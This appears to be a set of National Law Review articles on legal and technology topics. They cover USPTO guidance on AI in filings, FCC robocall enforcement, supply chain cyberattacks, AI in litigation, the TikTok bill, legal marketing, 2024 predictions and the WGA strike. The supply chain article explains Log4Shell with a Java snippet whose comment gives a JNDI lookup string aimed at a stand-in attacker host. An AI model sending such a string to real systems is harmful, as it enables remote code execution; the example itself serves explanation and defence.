For All Patent/Trademark Practitioners: USPTO Provides Guidance for Use of AI in Preparing USPTO Submissions

The USPTO has delivered a clear message to patent and trademark attorneys, patent agents, and inventors: the use of artificial intelligence (AI), including generative AI, in patent and trademark activities and filings before the USPTO entails risks that must be mitigated, and you must disclose the use of AI in the creation of an invention or in practice before the USPTO if that use is material to patentability.

The USPTO’s new guidance, issued on April 11, 2024, is a counterpart to its guidance issued on February 13, 2024, which addresses the AI-assisted invention creation process. In the April 11 guidance, USPTO officials communicate the risks of using AI in preparing USPTO submissions, including patent applications, affidavits, petitions, office action responses, information disclosure statements, Patent Trial and Appeal Board (PTAB) submissions, and trademark and Trademark Trial and Appeal Board (TTAB) submissions. The common theme between the February 13 and April 11 guidance is the duty to disclose to the USPTO all information known to be material to patentability.

Building on the USPTO’s existing rules and policies, the USPTO’s April 11 guidance discusses the following:

(A) The duty of candor and good faith – each individual associated with a proceeding at the USPTO owes a duty to disclose to the USPTO all information known to be material to patentability, including information on the use of AI by inventors, parties, and practitioners.

(B) Signature requirement and corresponding certifications – using AI to draft documents without verifying the information risks “critical misstatements and omissions”. Any submission to the USPTO that AI helped prepare must be carefully reviewed by practitioners, who remain ultimately responsible, to ensure that it is true and submitted for a proper purpose.

(C) Confidentiality of information – sensitive and confidential client information risks being compromised if shared with third-party AI systems, some of which may be located outside of the United States.

(D) Foreign filing licenses and export regulations – a foreign filing license from the USPTO does not authorize the exporting of subject matter abroad for the preparation of patent applications to be filed in the United States. Practitioners must ensure data is not improperly exported when using AI.

(E) USPTO electronic systems’ policies – practitioners using AI must be mindful of the terms and conditions of the USPTO’s electronic systems, which prohibit unauthorized access to, use, modification, or disclosure of the data contained in those systems or in transit to and from them.

(F) The USPTO Rules of Professional Conduct – when using AI tools, practitioners must ensure that they are not violating the duties owed to clients. For example, practitioners must have the requisite legal, scientific, and technical knowledge to reasonably represent the client, without inappropriate reliance on AI. Practitioners also have a duty to reasonably consult with the client, including about the use of AI in accomplishing the client’s objectives.

The USPTO’s April 11 guidance overall shares principles with the ethics guidelines that multiple state bars have issued on generative AI use in the practice of law, and addresses them in the patent- and trademark-specific context. Importantly, in addition to ethics considerations, the USPTO guidance reminds us that knowing or willful withholding of information about AI use under (A), overlooking AI’s misstatements leading to a false certification under (B), or AI-mediated improper or unauthorized exporting of data or unauthorized access to data under (D) and (E) may lead to criminal or civil liability under federal law, or to penalties or sanctions by the USPTO.

On the positive side, the USPTO guidance describes the possible favorable aspects of AI “to expand access to our innovation ecosystem and lower costs for parties and practitioners…. The USPTO continues to be actively involved in the development of domestic and international measures to address AI considerations at the intersection of innovation, creativity, and intellectual property.” We expect more USPTO AI guidance to be forthcoming, so please do watch for continued updates in this area.

FCC Puts Another Carrier On Notice with Cease and Desist Letter

If you haven’t already figured it out, the FCC is serious about carriers and providers not carrying robocalls.

The FCC sent a cease and desist letter to DigitalIPvoice informing them of the need to investigate suspected traffic. The FCC reminded them that failure to comply with the letter “may result in downstream voice service providers permanently blocking all of DigitalIPvoice’s traffic”.

For background, DigitalIPvoice is a gateway provider, meaning it accepts calls directly from foreign originating or intermediate providers. The Industry Traceback Group (ITG) investigated some questionable traffic back in December and identified DigitalIPvoice as the gateway provider for some of the calls. ITG informed DigitalIPvoice, and “DigitalIPvoice did not dispute that the calls were illegal.”

This is problematic because, as the FCC states, “gateway providers that transmit illegal robocall traffic face serious consequences, including blocking by downstream providers of all of the provider’s traffic.”

Emphasis in original. Yes. The FCC sent that in BOLD to DigitalIPvoice. I love aggressive formatting choices.

The FCC then gave DigitalIPvoice steps to take in response to the notice: investigate the traffic, block the identified traffic, and report back to the FCC and the ITG on the outcome of the investigation.

The whole letter is worth reading, but here are a few points for voice service providers and gateway providers:

  1. You have to know who your customers are and what they are doing on your network. The FCC is requiring voice service providers and gateway providers to include know-your-customer (KYC) procedures in their robocall mitigation plans.
  2. You have to work with the ITG. You have to have a traceback policy and procedures. All traceback requests have to be treated as a P0 priority.
  3. You have to be able to trace the traffic you are handling. From beginning to end.

The FCC is going after robocalls hard. Protect yourself by understanding what is going to be required of your network.

Keeping you in the loop.

For more news on FCC Regulations, visit the NLR Communications, Media & Internet section.

Supply Chains are the Next Subject of Cyberattacks

The cyberthreat landscape is evolving as threat actors develop new tactics to keep up with increasingly sophisticated corporate IT environments. In particular, threat actors are increasingly exploiting supply chain vulnerabilities to reach downstream targets.

The effects of supply chain cyberattacks are far-reaching, extend to downstream organizations, and can last long after the attack was first deployed. According to an Identity Theft Resource Center report, “more than 10 million people were impacted by supply chain attacks targeting 1,743 entities that had access to multiple organizations’ data” in 2022. Based upon an IBM analysis, the cost of a data breach averaged $4.45 million in 2023.

What is a supply chain cyberattack?

Supply chain cyberattacks are a type of cyberattack in which a threat actor targets a business offering third-party services to other companies. The threat actor will then leverage its access to the target to reach and cause damage to the business’s customers. Supply chain cyberattacks may be perpetrated in different ways.

  • Software-Enabled Attack: This occurs when a threat actor uses an existing software vulnerability to compromise the systems and data of organizations running the software containing the vulnerability. For example, Apache Log4j is an open-source library that developers use in software to maintain records of system activity. In late 2021, public reports emerged of a Log4j remote code execution vulnerability that allowed threat actors to infiltrate target software running outdated Log4j code versions. As a result, threat actors gained access to the systems, networks, and data of many organizations in the public and private sectors that used software containing the vulnerable Log4j version. Although security upgrades (i.e., patches) have since been issued to address the Log4j vulnerability, much software and many apps are still running outdated (i.e., unpatched) versions of Log4j. A minimal sketch of the vulnerable logging pattern appears after this list.
  • Software Supply Chain Attack: This is the most common type of supply chain cyberattack, and occurs when a threat actor infiltrates and compromises software with malicious code, either before the software is provided to consumers or by deploying malicious software updates masquerading as legitimate patches. All users of the compromised software are affected by this type of attack. For example, Blackbaud, Inc., a software company providing cloud hosting services to for-profit and non-profit entities across multiple industries, was ground zero for a software supply chain cyberattack after a threat actor deployed ransomware in its systems, with downstream effects on Blackbaud’s customers, which include some 45,000 companies. Similarly, in May 2023, Progress Software’s MOVEit file-transfer tool was targeted by a ransomware group that exploited a vulnerability to steal data from customers that used the MOVEit app, including government agencies and businesses worldwide.
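To make the Log4j example concrete, here is a minimal, hypothetical sketch of the kind of innocuous-looking code that exposed organizations to the vulnerability (CVE-2021-44228, known as “Log4Shell”). The class and method names are invented for illustration, and the snippet assumes an application running one of the vulnerable Log4j 2.x releases (2.0-beta9 through 2.14.1):

```java
import org.apache.logging.log4j.LogManager;
import org.apache.logging.log4j.Logger;

// Hypothetical request handler that logs a value the end user controls.
public class LoginHandler {
    private static final Logger logger = LogManager.getLogger(LoginHandler.class);

    public void recordFailedLogin(String username) {
        // On vulnerable Log4j releases, "lookups" were evaluated inside logged
        // messages and parameters. An attacker who submits a username such as
        //   ${jndi:ldap://attacker.example.com/a}
        // causes this line to perform a JNDI lookup against the attacker's
        // server, which can return a payload that executes on this host.
        logger.error("Failed login for user: {}", username);
    }
}
```

Notably, the flaw sits in the dependency rather than in the application code itself, which is why remediation meant patching or removing vulnerable Log4j versions throughout the software supply chain.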

Legal and Regulatory Risks

Cyberattacks can often expose personal data to unauthorized access and acquisition by a threat actor. When this occurs, companies’ notification obligations under the data breach laws of jurisdictions in which affected individuals reside are triggered. In general, data breach laws require affected companies to submit notice of the incident to affected individuals and, depending on the facts of the incident and the number of such individuals, also to regulators, the media, and consumer reporting agencies. Companies may also have an obligation to notify their customers, vendors, and other business partners based on their contracts with these parties. These reporting requirements increase the likelihood of follow-up inquiries, and in some cases, investigations by regulators. Reporting a data breach also increases a company’s risk of being targeted with private lawsuits, including class actions and lawsuits initiated by business customers, in which plaintiffs may seek different types of relief including injunctive relief, monetary damages, and civil penalties.

The legal and regulatory risks in the aftermath of a cyberattack can persist long after a company has addressed the immediate issues that caused the incident initially. For example, in the aftermath of the cyberattack, Blackbaud was investigated by multiple government authorities and targeted with private lawsuits. While the private suits remain ongoing, Blackbaud settled with state regulators ($49,500,000), the U.S. Federal Trade Commission, and the U.S. Securities and Exchange Commission (SEC) ($3,000,000) in 2023 and 2024, almost four years after it first experienced the cyberattack. Other companies that experienced high-profile cyberattacks have also been targeted with securities class action lawsuits by shareholders, and in at least one instance, regulators have named a company’s Chief Information Security Officer in an enforcement action, underscoring the professional risks cyberattacks pose to corporate security leaders.

What Steps Can Companies Take to Mitigate Risk?

First, threat actors will continue to refine their tactics and techniques, so all organizations must adapt and stay current with the regulations and legislation surrounding cybersecurity. The Cybersecurity and Infrastructure Security Agency (CISA) urges developer education on creating secure code and verifying third-party components (a minimal verification sketch follows).
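As one concrete, minimal illustration of verifying third-party components, the sketch below checks a downloaded vendor artifact against its published SHA-256 checksum before installation. The file name and hash value are hypothetical, and checksum verification is only one layer of supply chain assurance (code signing and software bills of materials go further):

```java
import java.nio.file.Files;
import java.nio.file.Path;
import java.security.MessageDigest;
import java.util.HexFormat;

public class ArtifactVerifier {
    // Computes the SHA-256 digest of a downloaded artifact and compares it to
    // the checksum the vendor published. A mismatch means the file was corrupted
    // or tampered with somewhere in the supply chain and must not be deployed.
    static boolean matchesPublishedHash(Path artifact, String publishedSha256) throws Exception {
        byte[] digest = MessageDigest.getInstance("SHA-256")
                .digest(Files.readAllBytes(artifact));
        return HexFormat.of().formatHex(digest).equalsIgnoreCase(publishedSha256);
    }

    public static void main(String[] args) throws Exception {
        // Hypothetical artifact name and hash, for illustration only.
        Path update = Path.of("vendor-update-2.4.1.jar");
        String published = "3a7bd3e2360a3d29eea436fcfb7e44c735d117c42d1c1835420b6b9942dd4f1b";
        if (!matchesPublishedHash(update, published)) {
            System.err.println("Checksum mismatch: do not install this update.");
        }
    }
}
```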

Second, stay proactive. Organizations must re-examine not only their own security practices but also those of their vendors and third-party suppliers. If third and fourth parties have access to an organization’s data, it is imperative to ensure that those parties have good data protection practices.

Third, companies should adopt guidelines for suppliers around data and cybersecurity at the outset of a relationship, since it may be difficult to get suppliers to adhere to policies after the contract has been signed. For example, some entities have detailed processes requiring suppliers to inform them of attacks and conduct impact assessments after the fact. In addition, some entities expect suppliers to follow specific sequences of steps after a cyberattack. At the same time, some entities may also apply the same threat intelligence that they use for their own defense to their critical suppliers, and may require suppliers to implement proactive security controls, such as incident response plans, ahead of an attack.

Finally, all companies should strive to minimize threats to their software supply by establishing strong security strategies at the ground level.

AI Got It Wrong, Doesn’t Mean We Are Right: Practical Considerations for the Use of Generative AI for Commercial Litigators

Picture this: You’ve just been retained by a new client who has been named as a defendant in a complex commercial litigation. While the client has solid grounds to be dismissed from the case at an early stage via a dispositive motion, the client is also facing cost constraints. This forces you to get creative when crafting a budget for your client’s defense. You remember the shiny new toy that is generative Artificial Intelligence (“AI”). You plan to use AI to help save costs on the initial research, and even potentially assist with brief writing. It seems you’ve found a practical solution to resolve all your client’s problems. Not so fast.

Seemingly overnight, the use of AI platforms has become the hottest thing going, including (potentially) for commercial litigators. However, like most rapidly rising technological trends, the associated pitfalls don’t fully bubble to the surface until after the public has had an opportunity (or several) to put the technology to the test. Indeed, the use of AI platforms to streamline legal research and writing has already begun to show its warts. Of course, just last year, prime examples of the danger of relying too heavily on AI were exposed in highly publicized cases venued in the Southern District of New York. See, e.g., Benjamin Weiser, Michael D. Cohen’s Lawyer Cited Cases That May Not Exist, Judge Says, NY Times (December 12, 2023); Sara Merken, New York Lawyers Sanctioned for Using Fake ChatGPT Cases in Legal Brief, Reuters (June 26, 2023).

To ensure litigators strike the appropriate balance between using technological assistance to produce legal work product and continuing to adhere to the ethical duties and professional responsibilities mandated by the legal profession, below are some immediate considerations any complex commercial litigator should abide by when venturing into the world of AI.

Confidentiality

As any experienced litigator will know, involving a third party in the process of crafting a client’s strategy and case theory—whether it be an expert, accountant, or investigator—inevitably raises the issue of protecting the client’s privileged, proprietary, and confidential information. The same principle applies to the use of an AI platform. Indeed, when stripped of its bells and whistles, an AI platform can be viewed as another consultant employed to provide work product that will assist in the overall representation of your client. Given this reality, it is imperative that any litigator who plans to use AI also have a complete grasp of the security of that AI system, to ensure the safety of the client’s privileged, proprietary, and confidential information. A failure to do so may not only result in your client’s sensitive information being exposed to an insecure, and potentially harmful, online network, but may also result in a violation of the duty to make reasonable efforts to prevent the disclosure of, or unauthorized access to, your client’s sensitive information. Such a duty is routinely set forth in the applicable rules of professional conduct across the country.

Oversight

It goes without saying that a lawyer has a responsibility to ensure that he or she adheres to the duty of candor when making representations to the Court. As mentioned, violations of that duty have arisen based on statements that were included in legal briefs produced using AI platforms. While many lawyers would immediately rebuff the notion that they would fail to double-check the accuracy of a brief’s contents—even if generated using AI—before submitting it to the Court, this concept gets trickier when working on larger litigation teams. As a result, it is not only incumbent on those preparing the briefs to ensure that any information included in a submission that was created with the assistance of an AI platform is accurate, but also that the lawyers responsible for oversight of a litigation team are diligent in understanding when and to what extent AI is being used to aid the work of that lawyer’s subordinates. Similar to confidentiality considerations, many courts’ rules of professional conduct include rules related to senior lawyer responsibilities and oversight of subordinate lawyers. To appropriately abide by those rules, litigation team leaders should make it a point to discuss with their teams the appropriate use of AI at the outset of any matter, as well as to put in place any law firm, court, or client-specific safeguards or guidelines to avoid potential missteps.

Judicial Preferences

Finally, as the old saying goes: a good lawyer knows the law; a great lawyer knows the judge. Any savvy litigator knows that the first thing to understand prior to litigating a case is whether the Court and the presiding Judge have put in place any standing orders or judicial preferences that may impact litigation strategy. In response to the rise of AI use in litigation, many Courts across the country have developed standing orders, local rules, or related guidelines concerning the appropriate use of AI. See, e.g., Standing Order Re: Artificial Intelligence (“AI”) in Cases Assigned to Judge Baylson (E.D. Pa. June 6, 2023); Preliminary Guidelines on the Use of Artificial Intelligence by New Jersey Lawyers (N.J. Supreme Court, January 25, 2024). Litigators should follow suit and ensure they understand the full scope of how their Court, and more importantly, their assigned Judge, treats the issue of using AI to assist litigation strategy and the development of work product.

U.S. House of Representatives Passes Bill to Ban TikTok Unless Divested from ByteDance

Yesterday, with broad bipartisan support, the U.S. House of Representatives voted overwhelmingly (352-65) to support the Protecting Americans from Foreign Adversary Controlled Applications Act, designed to begin the process of banning TikTok’s use in the United States. This is music to my ears. See a previous blog post on this subject.

The Act would penalize app stores and web hosting services that host TikTok while it is owned by Chinese-based ByteDance. However, if the app is divested from ByteDance, the Act will allow use of TikTok in the U.S.

National security experts have warned legislators and the public that downloading and using TikTok poses a national security threat. The threat arises because ByteDance is required by Chinese law to share users’ data with the Chinese Communist government. When the app is downloaded, TikTok obtains access to users’ microphones, cameras, and location services, making it essentially spyware tracking over 170 million Americans’ every move (dance or not).

Lawmakers are concerned about the detailed sharing of Americans’ data with one of the country’s top adversaries and about the ability of TikTok’s algorithms to influence and launch disinformation campaigns against the American people. The Act will now make its way through the Senate, and if passed, President Biden has indicated that he will sign it. This is a big win for privacy and national security.

Copyright © 2024 Robinson & Cole LLP. All rights reserved.
by: Linn F. Freedman of Robinson & Cole LLP

For more news on Social Media Legislation, visit the NLR Communications, Media & Internet section.

Three Ways to Get Lawyers to Fall In Love with Marketing Technology

While it may (or may not) be shocking that 50% of marriages end in divorce, what may be a more jarring statistic is that 77% of lawyers have experienced a failed technology implementation. And while some may take a second or even third chance at marriage, you rarely get a second chance at a marketing technology implementation, especially at a law firm.

Today’s legal industry is hyper-competitive, and firms are asking attorneys to learn new skills and adopt new technology like artificial intelligence, eMarketing, or experience management systems. So, lawyers should be eager to embrace any MarTech that could help them gain an advantage, right? Unfortunately, fewer than 40% of lawyers use a CRM, and only slightly more than a quarter of them use it for sales pipeline management.

When considering lawyers’ love/hate relationship with their firm’s marketing technology infrastructure, it is important to consider the lawyer’s perspective when it comes to change management and technology adoption. By nature, lawyers are skeptical, hypercritical, risk-averse, and reluctant to change. These attributes are certainly beneficial for practicing law, but not so much for encouraging marketing technology adoption. This is why it can sometimes feel like you are herding cats, except these cats are extremely smart, have opposable thumbs, and argue for sport.

While lawyers and technology might not seem like a match made in heaven, you can follow these steps to ensure greater adoption and utilization of your marketing technology:

1. Needs Assessment

The beauty of technology is that it can do so many things; the problem with technology is… it can do so many things. For technology to succeed, it has to adequately satisfy the end users’ needs. Because each firm has its own set of unique needs, technology selection should start with a needs assessment. Interviews should be conducted with key stakeholders to determine your organization’s specific needs and requirements.

As a follow-up to the needs assessment, interview user groups like attorneys, partners, and even their assistants to understand their needs and requirements, as well as their day-to-day processes and problems. These groups each define value differently, meaning that each group will have its own unique needs or set of requirements. Making these users part of the process upfront will increase the likelihood they’ll adopt the technology later on.

2. Communicate

Like any good love affair, a successful technology deployment requires extensive communication. Attorneys must be convinced that the technology will benefit not only the firm, but them individually. It can be helpful to take the time to craft a formal communication plan, starting with an announcement from firm leadership outlining the system’s benefits. Realistic expectations should be set, not only for the system but also for user requirements.

Next, establish, document, and distribute any processes and procedures necessary to support the implementation. Most importantly, sharing is caring, so always communicate when goals have been reached and solicit feedback from the end users.

3. Resources

All good relationships require attention. Oftentimes, firms forget to account for the long-term costs associated with a technology deployment. For a successful technology deployment, firms must dedicate the necessary resources, including time, money, and people. It also takes the coordinated efforts of everyone in the firm, so be sure to line up everyone and everything that may need to be involved, such as:

  • Technical support to assist with implementation and integrations
  • Training programs with outlined criteria for different user groups
  • Data stewards (internal or outsourced) to make sure data is clean, correct and complete
  • The marketing and business development departments that will be tasked with developing and executing a communication strategy
  • Firm leadership and key attorneys whose support can be used to drive adoption

© Copyright 2024 CLIENTSFirst Consulting

by: Christina R. Fritsch JD of CLIENTSFirst Consulting

For more news on Legal Marketing, visit the NLR Law Office Management section.

5 Trends to Watch: 2024 Emerging Technology

  1. Increased Adoption of Generative AI and Push to Minimize Algorithmic Biases – Generative AI took center stage in 2023, and the popularity of this technology will continue to grow. The importance of the art of crafting nuanced and effective prompts will heighten, and there will be greater adoption across a wider variety of industries. There should be advancements in algorithms, increasing accessibility through more user-friendly platforms. These developments can lead to an increased focus on minimizing algorithmic biases and the establishment of guardrails governing AI policies. Of course, a keen awareness of the ethical considerations and policy frameworks will help guide generative AI’s responsible use.
  2. Convergence of AR/VR and AI May Result in “AR/VR on Steroids.” The fusion of Augmented Reality (AR) and Virtual Reality (VR) technologies with AI unlocks a new era of customization and promises enhanced immersive experiences, blurring the lines between the digital and physical worlds. We expect to see further refining and personalizing of AR/VR to redefine gaming, education, and healthcare, along with various industrial applications.
  3. EV/Battery Companies Charge into Greener Future. With new technologies and chemistries, advancements in battery efficiency, energy density, and sustainability can move the adoption of electric vehicles (EVs) to new heights. Decreasing prices for battery metals can better help make EVs more competitive with traditional vehicles. AI may provide new opportunities in optimizing EV performance and help solve challenges in battery development, reliability, and safety.
  4. “Rosie the Robot” is Closer than You Think. With advancements in machine learning algorithms, sensor technologies, and integration of AI, the intelligence and adaptability of robotics should continue to grow. Large language models (LLMs) will likely encourage effective human-robot collaboration, and even non-technical users will find it easy to employ robotics to accomplish a task. Robotics is developing into a field where machines can learn, make decisions, and work in unison with people. It is no longer limited to monotonous activities and repetitive tasks.
  5. Unified Defense in the Battle Against Cyber-Attacks. Digital threats are expected only to increase in 2024, including more sophisticated AI-powered attacks. As the international battle against hackers rages on, threat detection, response, and mitigation will play a crucial role in staying ahead of rapidly evolving cyber-attacks. Given the risks to national security and economic growth, there should be increased collaboration between industries and governments to establish standardized cybersecurity frameworks to protect data and privacy.

10 Market Predictions for 2024 from a Healthcare Lawyer

For a healthcare lawyer, 2023 was a pretty unusual year, with the sudden entrance of a number of new players into the healthcare marketplace and a rapid retrenchment of others. With innovation showing no signs of slowing down in the year ahead, healthcare providers should consider how to adapt to improve the patient experience, increase their bottom line, and remain competitive in an evolving industry. Here are 10 personal observations from the past year that may help you plan for the year ahead.

  1. Health tech will continue to boom. Without a doubt, in my practice, health tech exploded, and understandably so. In the face of tight margins, healthcare technology may offer the promise of immediate returns (think revenue cycle). But it is also important to understand the context. Health tech offers the promise of quick implementation relative to construction of clinical space, and it can be accomplished without additional clinical staff or regulatory oversight, potentially resulting in a prompt return on investment. Advancing technologies and AI will enable real-time, data-driven surgical algorithms and patient-specific instruments to improve outcomes in a variety of specialties.
  2. Value-based care is here to stay. Everyone is interested in value-based care. In the past, value-based care was simply aspirational. Now, there are significant attempts to implement it on a sustained basis. It is not a coincidence that there has also been significant turnover in healthcare leadership in the past few years, and that has likely led to more receptivity.
  3. Expansion of value-based care models. There has been considerable activity around advanced primary care and single-condition chronic disease management. We are now starting to see broader efforts to manage care up and down the continuum of care, involving multi-specialty care and the gamut of care locations. Increased pressure to lower costs will result in increased volumes in lower cost, ambulatory settings.
  4. Regulatory scrutiny will continue to increase. For most, this is a given. In 2023, we saw increased scrutiny up and down the continuum, whether related to pharmaceutical costs, regulation of pharmacy benefit managers, healthcare transaction laws, or innovations in thinking around healthcare from the Federal Trade Commission. With the impending election, it is likely healthcare will receive considerable attention and scrutiny.
  5. Private equity (“PE”) will resume the march – with discipline. In my practice, PE entities rethought their growth strategies, shifting from a “growth at all costs” mindset to a focus on how to bring acquisitions to profitability quickly. Now there appears to be an increasing focus on operations and an emphasis on making realistic assumptions to underlie growth. This has led to a more realistic pricing discipline and investment in management teams with operational experience.
  6. Partnerships. There is an increasing trend towards partnerships between PE entities and health systems. Health systems are under considerable financial stress, and while they do not universally welcome PE with open arms, some systems do appear open to targeted partnerships. By the same token, PE entities are beginning to realize that they require clinical assets that are most readily available at health systems. This will continue in 2024.
  7. The rise of independent physician groups. There is increasing activity among freestanding physician groups. Some doctors are leery of PE because they believe it is solely focused on profits. Similarly, many physicians are reluctant to be employed by health systems because they believe they will simply become a referral source. While we are not likely to see a return to 2002, when many PE and health system physician deals were unwound, we will see increasing growth by independent physician groups.
  8. Continued consolidation. The trend towards consolidation in healthcare is nowhere near ending. To assume risk (the ultimate goal of value-based care), providers require scale, both vertically and horizontally. While segments of healthcare slowed in 2023, a resumption of growth is inevitable.
  9. Increased insolvencies. Most healthcare providers have very high fixed costs and low margins. Small swings in accounts receivable collections, wages, and managed care payments can have a large impact on entities that are just squeezing by.
  10. New entrants. Last year saw several new entrants to the healthcare marketplace nationally. Who in 2023 would have thought Best Buy would enter the healthcare marketplace? There is still plenty of room for new models of care, which we will see in 2024.

2024 promises to be an interesting year in the healthcare industry.

The FCC Approves an NOI to Dive Deeper into AI and its Effects on Robocalls and Robotexts

AI is on the tip of everyone’s tongue these days, it seems. The Dame brought you a recap of President Biden’s orders addressing AI at the beginning of the month. This morning, at the FCC’s open meeting, the commissioners were presented with a request for a Notice of Inquiry (NOI) to gather additional information about the benefits and harms of artificial intelligence and its use alongside robocalls and robotexts. The five areas of interest are as follows:

  • First, the NOI seeks comment on whether, and if so how, the commission should define AI technologies for purposes of the inquiry. This includes particular uses of AI technologies that are relevant to the commission’s statutory responsibilities under the TCPA, which protects consumers from nonemergency calls and texts using an autodialer or containing an artificial or prerecorded voice.
  • Second, the NOI seeks comment on how technologies may impact consumers who receive robocalls and robotexts including any potential benefits and risks that the emerging technologies may create. Specifically, the NOI seeks information on how these technologies may alter the functioning of the existing regulatory framework so that the commission may formulate policies that benefit consumers by ensuring they continue to receive privacy protections under the TCPA.
  • Third, the NOI seeks comment on whether it is necessary or possible to determine at this point whether future types of AI technologies may fall within the TCPA’s existing prohibitions on autodialed calls or texts and artificial or prerecorded voice messages.
  • Fourth, the NOI seeks comment on whether the commission should consider ways to verify the authenticity of legitimately generated AI voice or text content from trusted sources, such as through the use of watermarks, certificates, labels, signatures, or other forms of labeling when callers rely on AI technology to generate content. This may include, for example, emulating a human voice on a robocall or creating content in a text message.
  • Lastly, the NOI seeks comment on what next steps the commission should consider to further the inquiry.

While all the commissioners voted to approve the NOI, they did share a few insightful comments. Commissioner Carr stated, “If AI can combat illegal robocalls, I’m all for it,” but he also expressed that he does “…worry that the path we are heading down is going to be overly prescriptive” and suggested, “…Let’s put some common-sense guardrails in place, but let’s not be so prescriptive and so heavy-handed on the front end that we end up benefiting large incumbents in the space because they can deal with the regulatory frameworks and stifling the smaller innovation to come.”

Commissioner Starks shared, “I, for one, believe this intersectionality is critical because while the future of AI remains uncertain, one thing is clear — it has the potential to impact, if not transform, every aspect of American life, and because of that potential, each part of our government bears responsibility to better understand the risks and opportunities within its mandate, while being mindful of the limits of its expertise, experience, and authority. In this era of rapid technological change, we must collaborate and lean into our expertise across agencies to best serve our citizens and consumers.” Commissioner Starks seemed particularly focused on AI’s ability to facilitate bad actors in schemes like voice cloning, and on how the FCC can implement safeguards against this type of behavior.

“AI technologies can bring new challenges and opportunities. Responsible and ethical implementation of AI technologies is crucial to strike a balance, ensuring that the benefits of AI are harnessed to protect consumers from harm rather than amplifying the risks in an increasingly digital landscape,” Commissioner Gomez shared.

Finally, the AI NOI topic wrapped up with Chairwoman Rosenworcel commenting, “…I think we make a mistake if we only focus on the potential for harm. We need to equally focus on how artificial intelligence can radically improve the tools we have today to block unwanted robocalls and robotexts. We are talking about technology that can see patterns in our network traffic unlike anything we have today. It can lead to the development of analytic tools that are exponentially better at finding fraud before it reaches us at home. Used at scale, we can not only stop this junk, we can use it to increase trust in our networks. We are asking how artificial intelligence is being used right now to recognize patterns in network traffic and how it can be used in the future. We know the risks this technology involves, but we also want to harness the benefits.”

Automating Entertainment: Writers Demand that Studios Not Use AI

When the Writers Guild of America (WGA) came with its list of demands in the strike that has already ground production on many shows to a halt, chief among them was that the studios agree not to use artificial intelligence to write scripts. Specifically, the Guild had two asks: first, it said that “literary material,” including screenplays and outlines, must be generated by a person and not an AI; second, it insisted that “source material” not be AI-generated.

The Alliance of Motion Picture and Television Producers (AMPTP), which represents the studios, rejected this proposal, countering that it would be open to holding annual meetings to discuss advancements in technology. Alarm bells sounded as the WGA saw an existential threat to its survival, and a sign that Hollywood was already planning for it.

Writers are often paid at a far lower rate to adapt “source material” such as a comic book or a novel into a screenplay than they are paid to generate original literary material. By using AI tools to generate an outline or first draft of an original story and then enlisting a human to “adapt” it into a screenplay, production studios potentially stand to save significantly.

Many industries have embraced the workflow of an AI-generated “first draft” that the human then punches up. And the WGA has said that its writers’ using AI as a tool is acceptable: There would essentially be a robot in the writers’ room with writers supplementing their craft with AI-generated copy, but without AI wholly usurping their jobs.

Everyone appears to agree that AI could never write the next season of White Lotus or Succession, but lower-brow shows could easily be aped by AI. Law and Order, for instance, is an often-cited example, not just because it’s formulaic but because AIs are trained on massive data sets of copyrighted content and there are 20 seasons of Law and Order for the AI to ingest. And as AI technology gets more advanced, who knows what it could do? ChatGPT was initially released last November, and as of this writing we’re on GPT-4, a far more powerful version of a platform that is advancing exponentially.

The studios’ push for the expanded use of AI is not without its own risks. The Copyright Office has equivocated somewhat in its determination that AI-generated art is not protectable. In a recent Statement of Policy, the Office said that copyright will only protect aspects of the work that were judged to have been made by the authoring human, resulting in partial protections of AI-generated works. So, the better the AI gets—the more it contributes to cutting out the human writer—the weaker the copyright protection for the studios/networks.

Whether or not AI works infringe the copyrights on the original works is an issue that is currently being litigated in a pair of lawsuits against Stability AI, the startup that created Stable Diffusion (an AI tool with the impressive ability to turn text into images in what some have dubbed the most massive art heist in history). Some have questioned whether the humans who wrote the original episodes would get compensated, and the answer is maybe not. In most cases the scripts were likely works for hire, owned by the studios.

If the studios own the underlying scripts, what happens to the original content if the studios take copyrighted content and put it through a machine that turns out uncopyrightable content? Can you DMCA or sue someone who copies that? As of this writing, there are no clear answers to these questions.

There are legal questions and deeper philosophical questions about making art. As AI improves and humans become more cyborgian, does the art become indistinguishable? Prolific users of Twitter say they think their thoughts in 280 characters. Perhaps our readers can relate to thinking of their time in 6-minute increments, or .1s of an hour. Further, perhaps our readers can relate to their industry being threatened by automation. According to a recent report from Goldman Sachs, generative artificial intelligence is putting 44% of legal jobs at risk.

© Copyright 2023 Squire Patton Boggs (US) LLP

For more Employment Legal News, visit the National Law Review.